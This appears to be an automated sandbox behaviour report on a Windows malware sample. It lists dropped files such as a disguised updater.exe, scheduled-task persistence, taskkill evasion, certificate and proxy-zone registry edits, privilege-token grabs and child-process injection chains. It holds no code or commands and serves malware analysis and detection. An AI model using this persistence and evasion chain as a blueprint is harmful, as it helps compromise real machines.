File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1016 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1016 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1016 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 976 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 4612 wrote to memory of 3212 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3212 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3900 wrote to memory of 3380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 3380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 2152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
